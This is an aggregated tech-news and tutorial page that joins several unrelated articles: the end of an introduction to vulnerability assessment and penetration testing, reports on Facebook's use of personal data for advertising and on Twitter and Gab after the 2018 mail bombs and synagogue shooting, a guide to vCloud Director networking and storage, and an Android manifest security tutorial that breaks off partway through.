Penetration Testing adds a further step to vulnerability assessment: exploiting the vulnerabilities. Penetration Testing is an intrusive test, where the personnel doing the penetration test will first do a vulnerability assessment to identify the vulnerabilities and, as a next step, will try to penetrate the system by exploiting the identified vulnerabilities.

Need for Vulnerability Assessment

It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits of conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding.

Risk prevention

Vulnerability Assessment uncovers the loopholes, gaps, and vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in the IT infrastructure in time. Vulnerability Assessment reduces the likelihood of noncompliance with different compliance and regulatory requirements, since you already know your vulnerabilities. Awareness of such vulnerabilities in time can help an organization fix them and mitigate the risks involved before they get exploited. The risks of getting a vulnerability exploited include:

- Financial loss due to vulnerability exploits
- Damage to the organization's reputation
- Data theft
- Confidentiality compromise
- Integrity compromise
- Availability compromise

Compliance requirements

Well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in specific industry sectors, such as banking and telecom.

The life cycles of Vulnerability Assessment and Penetration Testing

This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following sequential stages are involved in this life cycle:

1. Scoping
2. Information gathering
3. Vulnerability scanning
4. False positive analysis
5. Vulnerability exploitation (Penetration Testing)
6. Report generation

Summary

In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and steps for installing and setting up Nessus.

Resources for Article:

Further resources on this subject:
CISSP: Vulnerability and Penetration Testing for Access Control [Article]
Penetration Testing and Setup [Article]
Web app penetration testing in Kali [Article]
Did you know Facebook shares the data you share with them for ‘security’ reasons with advertisers?

Natasha Mathur
28 Sep 2018
5 min read
Facebook is constantly under the spotlight these days when it comes to controversies regarding users' data and privacy. A new research paper published by Princeton University researchers states that Facebook shares the contact information you handed over for security purposes with its advertisers. This study was first brought to light by a Gizmodo writer, Kashmir Hill.

"Facebook is not content to use the contact information you willingly put into your Facebook profile for advertising. It is also using contact information you handed over for security purposes and contact information you didn't hand over at all, but that was collected from other people's contact books, a hidden layer of details Facebook has about you that I've come to call 'shadow contact information'," writes Hill.

Recently, Facebook introduced a new feature called custom audiences. Unlike traditional audiences, the advertiser is allowed to target specific users. To do so, the advertiser uploads users' PII (personally identifiable information) to Facebook. After the upload is done, Facebook matches the given PII against platform users, develops an audience that comprises the matched users, and allows the advertiser to further target that specific audience. Essentially, with Facebook, the holy grail of marketing, which is targeting an audience of one, is practically possible; never mind whether that audience wanted it or not.

In today's world, different social media platforms frequently collect various kinds of personally identifying information (PII), including phone numbers, email addresses, names, and dates of birth. The majority of this PII represents extremely accurate, unique, and verified user data. Because of this, these services have an incentive to exploit and use this personal information for other purposes. One such scenario is providing advertisers with more accurate audience targeting.

The paper, titled 'Investigating sources of PII used in Facebook's targeted advertising', is written by Giridhari Venkatadri, Elena Lucherini, Piotr Sapiezynski, and Alan Mislove. "In this paper, we focus on Facebook and investigate the sources of PII used for its PII-based targeted advertising feature. We develop a novel technique that uses Facebook's advertiser interface to check whether a given piece of PII can be used to target some Facebook user and use this technique to study how Facebook's advertising service obtains users' PII," reads the paper.

The researchers developed a novel methodology, which involved studying how Facebook obtains the PII to provide custom audiences to advertisers. "We test whether PII that Facebook obtains through a variety of methods (e.g., directly from the user, from two-factor authentication services, etc.) is used for targeted advertising, whether any such use is clearly disclosed to users, and whether controls are provided to users to help them limit such use," reads the paper. The paper uses size estimates to study which sources of PII are used for PII-based targeted advertising. The researchers used this methodology to investigate which sources of PII were actually used by Facebook for its PII-based targeted advertising platform. They also examined what information gets disclosed to users and what control users have over PII.

What sources of PII are actually being used by Facebook?

The researchers found that Facebook allows its users to add contact information (email addresses and phone numbers) to their profiles.
While any arbitrary email address or phone number can be added, it is not displayed to other users unless verified (through a confirmation email or confirmation SMS message, respectively). This is the most direct and explicit way of providing PII to advertisers.

The researchers then moved on to examine whether PII provided by users for security purposes, such as two-factor authentication (2FA) or login alerts, is being used for targeted advertising. They added and verified a phone number for 2FA on one of the authors' accounts. The added phone number became targetable after 22 days. This proved that a phone number provided for 2FA was indeed used for PII-based advertising, regardless of the user's privacy control choices.

What control do users have over PII?

Facebook gives users the liberty of choosing who can see each piece of PII listed on their profiles; the current list of possible general settings is: Public, Friends, Only Me. Users can also restrict the set of users who can search for them using their email address or their phone number. Users are provided with the following options: Everyone, Friends of Friends, and Friends. Facebook provides users with a list of advertisers who have included them in a custom audience using their contact information. Users can opt out of receiving ads from individual advertisers listed there. But information about what PII is used by advertisers is not disclosed.

What information about how Facebook uses PII gets disclosed to users?

On adding a mobile phone number directly to one's Facebook profile, no information about the uses of that number is directly disclosed. This information is only disclosed when adding a number from the Facebook website. As per the research results, there's very little disclosure to users, often in the form of generic statements that do not refer to the uses of the particular PII being collected, or that it may be used to allow advertisers to target users. "Our paper highlights the need to further study the sources of PII used for advertising, and shows that more disclosure and transparency needs to be provided to the user," say the researchers in the paper.

For more information, check out the official research paper.

Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma
How far will Facebook go to fix what it broke: Democracy, Trust, Reality
Mark Zuckerberg publishes Facebook manifesto for safeguarding against political interference

Social media platforms, Twitter and Gab.com, accused of facilitating recent domestic terrorism in the U.S.

Savia Lobo
29 Oct 2018
6 min read
Updated on 30 Oct 2018: Following PayPal, two additional platforms, Stripe and Joyent, have suspended Gab accounts from their respective platforms.

Social media platforms Twitter and Gab.com were at the center of two shocking stories of domestic terrorism. Both platforms were used by the men responsible for the mail bomb attacks and Pittsburgh's Tree of Life synagogue shooting to send cryptic threats. Following the events, both platforms have been accused of failing to act appropriately, both in terms of their internal policies and their ability to coordinate with law enforcement to deal with the threats.

Twitter fails to recognize a bomb attacker: mail bomber sent a threat first on Twitter

Twitter neglected an abuse report by a Twitter user against the mail bombing suspect. Rochelle Ritchie, a former congressional press secretary, tweeted that she had received threats from Cesar Altieri Sayoc via Twitter. Sayoc was later arrested and charged in connection with mailing at least 13 suspected explosive devices to prominent Democrats, the staff at CNN, and other U.S. officials, as Bloomberg reported.

On October 11, Ritchie received a tweet from an account using the handle @hardrock2016. The message was bizarre, saying, "So you like make threats. We Unconquered Seminole Tribe will answer your threats. We have nice silent Air boat ride for u here on our land. We will see you 4 sure. Hug your loved ones real close every time you leave your home." Ritchie immediately reported this to Twitter as abuse. Following this, Twitter responded that the tweet did not qualify as a "violation of the Twitter rules against abusive behavior." The tweet was visible on Twitter until Sayoc was arrested on Friday.

Ritchie tweeted again on Friday, "Hey @Twitter remember when I reported the guy who was making threats towards me after my appearance on @FoxNews and you guys sent back a bs response about how you didn't find it that serious. Well, guess what it's the guy who has been sending #bombs to high profile politicians!!!!" Later in the day, Twitter apologized in reply to Ritchie's tweet, saying it should have taken a different action when Ritchie had first approached them. Twitter's statement said: "The Tweet clearly violated our rules and should have been removed. We are deeply sorry for that error."

Twitter has been keen to assure users that it is working hard to combat harassment and abuse on its platform. But many users disagree. https://twitter.com/Luvvie/status/1055889940150607872 Even the apology sent to Ritchie looks a lot like the company is trying to sweep the matter under the carpet.

This wasn't the first time Sayoc used Twitter to post his sentiments. On September 18, Sayoc tweeted a picture of former Vice President Joe Biden's home and wrote, "Hug your loved son, Niece, wife family real close everytime U walk out your home." On September 20, in response to a tweet from President Trump, Sayoc posted a video of himself at what appears to be a Donald Trump rally. The text of the tweet threatened former Vice President Joe Biden and former attorney general Eric Holder. Later that week, they were targeted by improvised explosive devices. Twitter suspended Sayoc's accounts late Friday afternoon last week.
Shooter hinted at Pittsburgh shooting on Gab.com

"It's a very horrific crime scene; one of the worst that I've seen," Public Safety Director Wendell Hissrich said at a press conference.

Gab.com, which describes itself as "The Home Of Free Speech Online", was allegedly linked to the shooting at a synagogue in Pittsburgh on Saturday, 27 October 2018. The 46-year-old suspected shooter, Robert Bowers, posted on his Gab page, "jews are the children of satan." He also reportedly shouted "all Jews must die" before he opened fire at the Tree of Life synagogue in Pittsburgh's Squirrel Hill neighborhood. According to The Hill's report, "Gab.com rejected claims it was responsible for the shooting after it confirmed that the name identified in media reports as the suspect matched the name on an account on its platform."

PayPal, GoDaddy suspend Gab.com for promoting hate speech

Following the Pittsburgh shooting incident, PayPal has banned Gab.com. A PayPal spokesperson confirmed the ban to The Verge, citing hate speech as the reason for the action: "The company is diligent in performing reviews and taking account actions. When a site is explicitly allowing the perpetuation of hate, violence or discriminatory intolerance, we take immediate and decisive action." https://twitter.com/getongab/status/1056283312522637312 Similarly, GoDaddy, a domain hosting website, has threatened to suspend the Gab.com domain if it fails to transfer to a new provider. Currently, Gab is inaccessible through the GoDaddy website.

Gab.com denies enabling hate speech

Denying the claims, Gab.com said that it has zero tolerance for terrorism and violence. "Gab unequivocally disavows and condemns all acts of terrorism and violence," the site said in a statement. "This has always been our policy. We are saddened and disgusted by the news of violence in Pittsburgh and are keeping the families and friends of all victims in our thoughts and prayers." Gab was quick to respond to the accusation, taking swift and proactive action to contact law enforcement. It first backed up all user data from the account and then proceeded to suspend the account. "We then contacted the FBI and made them aware of this account and the user data in our possession. We are ready and willing to work with law enforcement to see to it that justice is served," Gab said. Gab.com also stated that the shooter had accounts on other social media platforms, including Facebook, which has not yet confirmed the deactivation of the account. Federal investigators are reportedly treating the attack as a potential hate crime.

This incident is a stark reminder of how online hate can easily escalate into the real world. It also sheds light on how easy it is to misuse any social media platform to post threats, some of which can also be hoaxes. Most importantly, it underscores how ill-equipped social media platforms are, not just at identifying such threats, but also at prioritizing manually flagged content and alerting the concerned authorities in time to avert tragedies such as this. To gain more insights on these two scandals, head over to CNN and The Hill.

5 nation joint Activity Alert Report finds most threat actors use publicly available tools for cyber attacks
Twitter on the GDPR radar for refusing to provide a user his data due to 'disproportionate effort' involved
90% Google Play apps contain third-party trackers, share user data with Alphabet, Facebook, Twitter, etc: Oxford University Study

vCloud Networks

Packt
13 Sep 2013
14 min read
(For more resources related to this topic, see here.)

Basics

Network virtualization is what makes vCloud Director such an awesome tool. However, before we go all out in the next article, we need to set up network virtualization, and this is what we will be focusing on here. When we talk about isolated networks, we are talking about vCloud Director making use of different methods of network Layer 3 encapsulation (OSI/ISO model). Basically, it is the same concept as was introduced with VLANs: VLANs split up the network communication in physical network cables into totally isolated communication streams. vCloud makes use of these isolated networks to create isolated Org and vApp networks.

vCloud Director has three different network items:

An external network is a network that exists outside the vCloud, for example, a production network. It is basically a PortGroup in vSphere that is used in vCloud to connect to the outside world. An external network can be connected to multiple organization networks. External networks are not virtualized and are based on existing PortGroups on a vSwitch or Distributed vSwitch.

An organization network (Org Net) is a network that exists only inside one organization. You can have multiple Org Nets in an organization. Organization networks come in three different shapes:

- Isolated: An isolated Org Net exists only in this organization and is not connected to an external network; however, it can be connected to vApp networks or VMs. This network type uses network virtualization and its own network settings.
- Routed Network (Edge Gateway): An Org Net that connects to an existing Edge device. An Edge Gateway allows you to define firewall and NAT rules, as well as VPN connections and load-balancing functionality. Routed gateways connect external networks to vApp networks and/or VMs. This network uses virtualized networks and its own network settings.
- Directly connected: These Org Nets are an extension of an external network into the organization. They directly connect external networks to vApp networks or VMs. These networks do NOT use network virtualization and they make use of the network settings of an external network.

A vApp network is a virtualized network that only exists inside a vApp. You can have multiple vApp networks inside one vApp. A vApp network can connect to VMs and to Org networks. It has its own network settings. When connecting a vApp network to an Org network, you can create a router between the vApp and the Org network that lets you define DHCP, firewall, NAT rules, and static routing.

To create isolated networks, vCloud Director uses network pools. Network pools are collections of VLANs, PortGroups, and networks that use L2-in-L3 encapsulation. The content of these pools can be used by Org and vApp networks for network virtualization.

Network Pools

There are four kinds of network pools that can be created:

- VXLAN: VXLAN networks are Layer 2 networks that are encapsulated in Layer 3 packets. VMware calls this Software-Defined Networking (SDN). VXLANs are automatically created by vCD; however, they don't work out of the box and require some extra configuration in vCloud Network and Security (see later).
- Network isolation-backed: These are basically the same as VXLANs; however, they work out of the box and use MAC-in-MAC encapsulation. The difference is that VXLANs can transcend routers, while network isolation-backed networks can't.
- vSphere PortGroup-backed: vCD will use pre-created PortGroups to build the vApp or organization networks.
You need to pre-provision one PortGroup for every vApp/Org network you would like to use.
- VLAN-backed: vCD will use a pool of VLAN numbers to automatically provision PortGroups on demand; however, you still need to configure the VLAN trunking. You will need to reserve one VLAN for every vApp/Org network you would like to use.

VXLANs and network isolation-backed networks solve the problems of pre-provisioning and reserving a multitude of VLANs, which makes them extremely important. However, using PortGroup or VLAN network pools can have additional benefits that we will explore later.

Types of vCloud networks

vCloud Director has basically three different network items. An external network is basically a PortGroup in vSphere that is imported into vCloud. An Org network is an isolated network that exists only in an organization. The same is true for vApp networks; they exist only in vApps. In the picture above you can see all possible connections. Let's play through the scenarios and see how one can use them.

Isolated vApp network

An isolated vApp network exists only inside a vApp. These networks are useful if one needs to test how VMs behave in a network, or to test using an IP range that is already in use (for example, production). The downside is that they are isolated, meaning it is hard to get information or software in and out. Have a look at the recipe for RDP (or SSH) forwarding into an isolated vApp to find some answers to this problem.

VMs directly connected to an external network

VMs inside a vApp are connected to a direct Org network, meaning they will be able to get IPs from the external network pool. Typically these VMs are used for production, meaning that customers choose vCloud for fast provisioning of predefined templates. As vCloud manages the IPs for a given IP range, it can be quite easy to fast-provision a VM.

vApp network connected via a vApp router to an external network

VMs are connected to a vApp network that has a vApp router defined as its gateway. The gateway connects to a direct Org network, meaning that the gateway will automatically be given an IP from the external network pool. These configurations come in handy to reduce the amount of "physical" networking that has to be done. The vApp router can act as a router with defined firewall rules; it can do SNAT and DNAT, as well as define static routing. So instead of using up a "physical" VLAN or subnet, one can hide away applications this way. As an added benefit, these applications can be used as templates for fast deployment.

VMs directly connected to an isolated OrgNet

VMs are connected directly to an isolated Org network. Connecting VMs directly to an isolated network normally only makes sense if there is more than one vApp/VM connected to the Org network. This is used as an extension of the isolated vApp concept: you need to repeatedly test complex applications that require certain infrastructure, such as Active Directory, DHCP, DNS, database, or Exchange servers. Instead of deploying large isolated vApps that contain these, you could deploy them in one vApp and connect them via an isolated Org network directly to the vApp that contains your testing VMs. This makes it possible to reuse this base infrastructure. By using sharing, you can even hide the infrastructure vApp from your users.

vApp connected via a vApp router to an isolated OrgNet

VMs are connected to a vApp network that has a vApp router as its gateway. The vApp router automatically gets its IP from the Org network pool. This is basically a variant of the previous idea.
A test vApp or an infrastructure vApp can be packaged this way and made ready for fast deployment.

VMs connected directly to an Edge

VMs are directly connected to the Edge Org network and get their IPs from the Org network pool. Their gateway is the Edge device that connects them to the external networks through the Edge firewall. A very typical setup is using the Edge load-balancing feature to load balance VMs out of a vApp via the Edge. Another is an organization that is secured using the Edge Gateway against other organizations that use the same external network. This is mostly the case if the external network is the Internet and each organization is an external customer.

vApp connected to an Edge via a vApp router

VMs are connected to a vApp network that has the vApp router as its gateway. The vApp router will automatically get an IP from the Org network, which has the Edge as its gateway. This is a more complicated variant of the above scenario, allowing customers to package their VMs, secure them against other vApps or VMs, or subdivide their allocated networks.

IP management

Let's have a look at IP management in vCloud. vCloud knows three different settings for IP management of VMs:

- DHCP: You need to provide a DHCP server; vCloud doesn't automatically create one. However, a vApp router or an Edge can create one.
- Static – IP Pool: The IP for the VM comes from the static IP pool of the network it is connected to. In addition, the DNS and domain suffix will be written to the VM.
- Static – Manual: The IP can be defined on the spot; however, it must be in the network defined by the gateway and the network mask of the network the VM is connected to. In addition, the DNS and domain suffix will be written to the VM.

All these settings require Guest Customization to be effective. If no Guest Customization is selected, they don't work, and whatever the VM was configured with as a template will be used.

vSphere and vCloud vApps

One thing that needs to be said about vApps is that they actually come in two completely different versions: the vCenter vApp and the vCloud vApp. The vSphere vApp concept was introduced in vSphere 4.0 as a container for VMs. In vSphere, a vApp is essentially a resource pool with some extras, such as a starting and stopping order and (if you configured it) a network IP allocation method. The idea is to have an entity of VMs that builds one unit. Such a vApp can then be exported or imported using the OVF format. A very good example of a vApp is VMware Operations Manager. It comes as a vApp in OVF format and contains not only the VMs but also the start-up sequence, as well as some setup scripts. When the vApp is deployed the first time, additional information, such as network settings, is requested and then implemented. As a vSphere vApp is a resource pool, it can be configured so that it will only demand the resources it is using; on the other hand, resource pool configuration is something most people struggle with. A vSphere vApp is ONLY a resource pool; it is not automatically a folder in the Folder and Template view of vSphere, but it is shown there as a vApp.

The vCloud vApp is a very different concept. First of all, it is not a resource pool; the VMs of a vCloud vApp live in the OvDC resource pool. However, the vCloud vApp is automatically a folder in the Folder and Template view of vSphere. It is a construct created by vCloud that consists of VMs, a start and stop sequence, and networks. The network part is one of the major differences (next to the resource pool).
While in vSphere only network information, such as how IPs get assigned, and settings such as the gateway and DNS, is given to the vApp, a vCloud vApp actually encapsulates networks. The vCloud vApp networks are full networks, meaning they contain the full information for a given network, including network settings and IP pools. For more details, see the last article. This information is kept when importing and exporting vCloud vApps. When I talk about vApps in this book, I will always mean vCloud vApps; vCenter vApps, where they feature, will be written as vCenter vApp.

Datastores, profiles and clusters

I probably don't have to explain what a datastore is, but here is a short intro just in case. A datastore is a VMware object that exists in ESXi. This object can be a hard disk that is attached to an ESXi server, an NFS or iSCSI mount on an ESXi host, or a Fibre Channel disk that is attached to an HBA on the ESXi server.

A storage profile is a container that holds one or more datastores. A storage profile doesn't have any intelligence implemented; it just groups the storage. However, it is extremely beneficial in vCloud: if you run out of storage on a datastore, you can just add another datastore to the same storage profile and you're back in business.

Datastore clusters are again containers for datastores, but now there is intelligence included. A datastore cluster can use Storage DRS, which allows VMs to automatically use Storage vMotion to move from one datastore to another if the I/O latency is high or the free storage is low. Depending on your storage backend system, this can be extremely useful. vCloud Director doesn't know the difference between a storage profile and a datastore cluster. If you add a datastore cluster, vCloud will pick it up as a storage profile, but that's OK because it's not a problem at all. Be aware that storage profiles are part of vSphere Enterprise Plus licensing. If you don't have Enterprise Plus, you won't get storage profiles, and the only thing you can do in vCloud is use the storage profile ANY, which doesn't contribute to productivity.

Thin provisioning

Thin provisioning means that the file that contains the virtual hard disk (.vmdk) is only as big as the amount of data written to the virtual hard disk. As an example, if you have a 40 GB hard disk attached to a Windows VM and have just installed Windows on it, you are using around 2 GB of the 40 GB disk. When using thin provisioning, only 2 GB will be written to the datastore, not 40 GB. If you don't use thin provisioning, the .vmdk file will be 40 GB big. If your storage vendor's Storage APIs are integrated into your ESXi servers, thin provisioning may be offloaded to your storage backend, making it even faster.

Fast provisioning

Fast provisioning is similar to the linked clones that you may know from Lab Manager or VMware View. However, in vCloud they are a bit more intelligent than in the other products: in those products, linked clones cannot be deployed across different datastores, but in vCloud they can.

Let's talk about how linked clones work. If you have a VM with a hard disk of 40 GB and you clone that VM, you would normally have to spend another 40 GB (not using thin provisioning). Using linked clones, you will need much less. What happens, in layman's terms, is that vCloud creates two snapshots of the original VM's hard disk. A snapshot contains only the differences between the original and the snapshot. The original hard disk (.vmdk file) is set to read-only, and the first snapshot is connected to the original VM, so that one can still work with the original VM. The second snapshot is used to create the new VM. Using snapshots makes deploying a VM with fast provisioning not only fast, but it also saves a lot of disk space.

The problem with this is that a snapshot must be on the same datastore as its source. So if you have a VM in one datastore, its linked clone cannot be in another. vCloud has solved that problem by deploying a shadow VM: when you deploy a VM with fast provisioning onto a different datastore than its source, vCloud creates a full clone (a normal full copy) of the VM onto the new datastore and then creates a linked clone from the shadow VM. If your storage vendor's Storage APIs are integrated into your ESXi servers, fast provisioning may be offloaded to your storage backend, making it faster. See also the recipe "Making NFS based datastores faster". The back-of-the-envelope numbers below show why linked clones save so much space.
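As an illustration, the 40 GB base disk matches the example above, but the 2 GB per-clone delta is a made-up assumption, not a vCloud default:

// Back-of-the-envelope comparison of full clones versus linked clones.
// All sizes are hypothetical; real deltas depend on how much each clone writes.
public class LinkedCloneSavings {
    public static void main(String[] args) {
        double baseGb = 40.0;   // size of the source VM's virtual disk
        double deltaGb = 2.0;   // assumed average snapshot delta per clone
        int clones = 10;

        double fullClones = clones * baseGb;             // 10 * 40 = 400 GB
        double linkedClones = baseGb + clones * deltaGb; // 40 + 20  =  60 GB

        System.out.printf("Full clones:   %.0f GB%n", fullClones);
        System.out.printf("Linked clones: %.0f GB (%.0f%% saved)%n",
                linkedClones, 100 * (1 - linkedClones / fullClones));
    }
}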
Summary

In this article, we saw vCloud networks, vSphere and vCloud vApps, and datastores, profiles, and clusters.

Resources for Article:

Further resources on this subject:
Windows 8 with VMware View [Article]
VMware View 5 Desktop Virtualization [Article]
Cloning and Snapshots in VMware Workstation [Article]
Packt
23 Aug 2013
21 min read
Save for later

Defining the Application's Policy File

(For more resources related to this topic, see here.)

The AndroidManifest.xml file

All Android applications need to have a manifest file. This file has to be named AndroidManifest.xml and has to be placed in the application's root directory. The manifest file is the application's policy file. It declares the application components, their visibility, access rules, libraries, features, and the minimum Android version that the application runs against. The Android system uses the manifest file for component resolution. Thus, the AndroidManifest.xml file is by far the most important file in the entire application, and special care is required when defining it to tighten up the application's security. The manifest file is not extensible, so applications cannot add their own attributes or tags. The complete list of tags, showing how they can be nested, is as follows:

<?xml version="1.0" encoding="utf-8"?>
<manifest>
    <uses-permission />
    <permission />
    <permission-tree />
    <permission-group />
    <instrumentation />
    <uses-sdk />
    <uses-configuration />
    <uses-feature />
    <supports-screens />
    <compatible-screens />
    <supports-gl-texture />
    <application>
        <activity>
            <intent-filter>
                <action />
                <category />
                <data />
            </intent-filter>
            <meta-data />
        </activity>
        <activity-alias>
            <intent-filter>
            </intent-filter>
            <meta-data />
        </activity-alias>
        <service>
            <intent-filter>
            </intent-filter>
            <meta-data />
        </service>
        <receiver>
            <intent-filter>
            </intent-filter>
            <meta-data />
        </receiver>
        <provider>
            <grant-uri-permission />
            <meta-data />
            <path-permission />
        </provider>
        <uses-library />
    </application>
</manifest>

Only two tags, <manifest> and <application>, are required. There is no specific order in which to declare components. The <manifest> tag declares the application-specific attributes. It is declared as follows:

<manifest package="string"
    android:sharedUserId="string"
    android:sharedUserLabel="string resource"
    android:versionCode="integer"
    android:versionName="string"
    android:installLocation=["auto" | "internalOnly" | "preferExternal"] >
</manifest>

An example of the <manifest> tag is shown in the following code snippet. In this example, the package is named com.android.example, the internal version is 10, and the user sees this version as 2.7.0. The install location is decided by the Android system based on where it has room to store the application.

<manifest package="com.android.example"
    android:versionCode="10"
    android:versionName="2.7.0"
    android:installLocation="auto" >

The attributes of the <manifest> tag are as follows:

package: This is the name of the package. It is the Java-style namespace of your application, for example, com.android.example, and is the unique ID of your application. If you change the name of a published application, it is considered a new application and auto updates will not work.
android:sharedUserId: This attribute is used if two or more applications share the same Linux ID. It is discussed in detail in a later section.
android:sharedUserLabel: This is the user-readable name of the shared user ID and only makes sense if android:sharedUserId is set. It has to be a string resource.
android:versionCode: This is the version code used internally by the application to track revisions. It is referred to when updating an application with a more recent version.
android:versionName: This is the version of the application shown to the user. It can be set as a raw string or as a reference, and is only used for display to users.
android:installLocation: This attribute defines the location where the APK will be installed.

The <application> tag is defined as follows:

<application android:allowTaskReparenting=["true" | "false"]
    android:backupAgent="string"
    android:debuggable=["true" | "false"]
    android:description="string resource"
    android:enabled=["true" | "false"]
    android:hasCode=["true" | "false"]
    android:hardwareAccelerated=["true" | "false"]
    android:icon="drawable resource"
    android:killAfterRestore=["true" | "false"]
    android:largeHeap=["true" | "false"]
    android:label="string resource"
    android:logo="drawable resource"
    android:manageSpaceActivity="string"
    android:name="string"
    android:permission="string"
    android:persistent=["true" | "false"]
    android:process="string"
    android:restoreAnyVersion=["true" | "false"]
    android:supportsRtl=["true" | "false"]
    android:taskAffinity="string"
    android:theme="resource or theme"
    android:uiOptions=["none" | "splitActionBarWhenNarrow"] >
</application>

An example of the <application> tag is shown in the following code snippet. In this example, the application name, description, icon, and label are set. The application is not debuggable and the Android system can instantiate its components.

<application android:label="@string/app_name"
    android:description="@string/app_desc"
    android:icon="@drawable/example_icon"
    android:enabled="true"
    android:debuggable="false">
</application>

Many attributes of the <application> tag serve as default values for the components declared within the application. These include permission, process, icon, and label. Other attributes, such as debuggable and enabled, are set for the entire application. The attributes of the <application> tag are discussed as follows:

android:allowTaskReparenting: This value can be overridden by the <activity> element. It allows an Activity to re-parent to the Activity it has affinity with when it is brought to the foreground.
android:backupAgent: This attribute contains the name of the backup agent for the application.
android:debuggable: When set to true, this attribute allows an application to be debugged. It should always be set to false before releasing the app in the market.
android:description: This is the user-readable description of the application, set as a reference to a string resource.
android:enabled: If this attribute is set to true, the Android system can instantiate the application components. It can be overridden by components.
android:hasCode: If this attribute is set to true, the application will try to load some code when launching its components.
android:hardwareAccelerated: When set to true, this attribute allows an application to use hardware-accelerated rendering. It was introduced in API level 11.
android:icon: This is the application icon as a reference to a drawable resource.
android:killAfterRestore: If this attribute is set to true, the application will be terminated once its settings are restored during a full-system restore.
android:largeHeap: This attribute lets the Android system create a large Dalvik heap for the application. It increases the memory footprint of the application, so it should be used sparingly.
android:label: This is the user-readable label for the application.
android:logo: This is the logo for the application.
android:manageSpaceActivity: This value is the name of the Activity that manages the storage space for the application.
android:name: This attribute contains the fully qualified name of the Application subclass that will be instantiated before any other component is started.
android:permission: This attribute sets the permission that a client should have to interact with the application. It can be overridden by a component.
android:persistent: Usually used by system applications, this attribute allows the application to be running at all times.
android:process: This is the name of the process in which a component will run. It can be overridden by any component's android:process attribute.
android:restoreAnyVersion: This attribute lets the backup agent attempt a restore even if the backup currently stored was made by a newer version of the application than the one attempting the restore now.
android:supportsRtl: When set to true, this attribute enables support for right-to-left layouts. It was added in API level 17.
android:taskAffinity: This attribute gives all activities an affinity with the package name, unless an Activity sets it explicitly.
android:theme: This is a reference to the style resource for the application.
android:uiOptions: If this attribute is set to none, there are no extra UI options; if set to splitActionBarWhenNarrow, a bar is set at the bottom when the screen is constrained.

In the following sections, we will discuss how to handle specific requirements using the policy file.

Application policy use cases

This section discusses how to define application policies using the manifest file. Each use case describes a requirement and how to implement it in the policy file.

Declaring application permissions

An application on the Android platform has to declare which resources it intends to use for its proper functioning. These are the permissions that are displayed to the user when they download the application. Application permissions should be descriptive so that users can understand them. Also, as is the general rule with security, it is important to request the minimum permissions required. Application permissions are declared in the manifest file by using the <uses-permission> tag. An example of a location-based manifest file that uses the GPS for retrieving location is shown in the following code snippet:

<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" />
<uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION" />
<uses-permission android:name="android.permission.INTERNET" />

These permissions are displayed to users when they install the app, and can always be checked by going to Application under the settings menu. These permissions are seen in the following screenshot:

Declaring permissions for external applications

The manifest file also declares the permissions that an external application (which does not run with the same Linux ID) needs in order to access the application components. These can be declared in one of two places in the policy file: in the <application> tag, or along with the component in the <activity>, <provider>, <receiver>, and <service> tags. If there are permissions that all components of an application require, it is easy to specify them in the <application> tag. If a component requires some specific permission, those can be defined in the specific component tag. Remember, only one permission can be declared in any of these tags. If a component is protected by a permission, the component permission overrides the permission declared in the <application> tag.
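All the examples that follow use platform-defined permissions, but the <permission> element from the tag listing earlier also lets an application define a permission of its own for other applications to hold. The following is a minimal sketch of that idea; the permission name, the service name, and the signature protection level are illustrative assumptions, not taken from the text:

<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.custom">

    <!-- Hypothetical custom permission; "signature" means only apps signed
         with the same certificate as this one can be granted it -->
    <permission
        android:name="com.example.custom.permission.ACCESS_MY_SERVICE"
        android:protectionLevel="signature" />

    <application android:label="@string/app_name">
        <!-- External callers must hold the custom permission to start or
             bind to this service -->
        <service
            android:name=".MyProtectedService"
            android:permission="com.example.custom.permission.ACCESS_MY_SERVICE" />
    </application>
</manifest>

A client application would then declare <uses-permission android:name="com.example.custom.permission.ACCESS_MY_SERVICE" /> in its own manifest to interact with the service.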
The following is an example of an application that requires external applications to have android.permission.ACCESS_COARSE_LOCATION to access its components and resources:

<application android:allowBackup="true"
    android:icon="@drawable/ic_launcher"
    android:label="@string/app_name"
    android:permission="android.permission.ACCESS_COARSE_LOCATION">

If a Service requires that any application component accessing it should have access to the external storage, it can be defined as follows:

<service android:enabled="true"
    android:name=".MyService"
    android:permission="android.permission.WRITE_EXTERNAL_STORAGE">
</service>

If a policy file has both the preceding tags, then when an external component makes a request to this Service, it should have android.permission.WRITE_EXTERNAL_STORAGE, as this permission overrides the permission declared by the <application> tag.

Applications running with the same Linux ID

Sharing data between applications is always tricky. It is not easy to maintain data confidentiality and integrity. Proper access control mechanisms have to be put in place based on who has access to how much data. In this section, we will discuss how to share application data with internal applications (signed by the same developer key). Android is a layered architecture with application isolation enforced by the operating system itself. Whenever an application is installed on an Android device, the Android system gives it a unique user ID defined by the system. Notice that the two applications, example1 and example2, in the following screenshot run as separate user IDs, app_49 and app_50:

However, an application can request the system for a user ID of its choice. Another application can then request the same user ID as well. This creates tight coupling and does not require components to be made visible to the other application or shared content providers to be created. This kind of tight coupling is set up in the manifest tags of all applications that want to run in the same process. The following is a snippet of the manifest files of two applications, com.example.example1 and com.example.example2, that use the same user ID:

<manifest package="com.example.example1"
    android:versionCode="1"
    android:versionName="1.0"
    android:sharedUserId="com.sharedID.example">

<manifest package="com.example.example2"
    android:versionCode="1"
    android:versionName="1.0"
    android:sharedUserId="com.sharedID.example">

The following screenshot is displayed when these two applications are running on the device. Notice that the applications com.example.example1 and com.example.example2 now both have the app ID app_113.

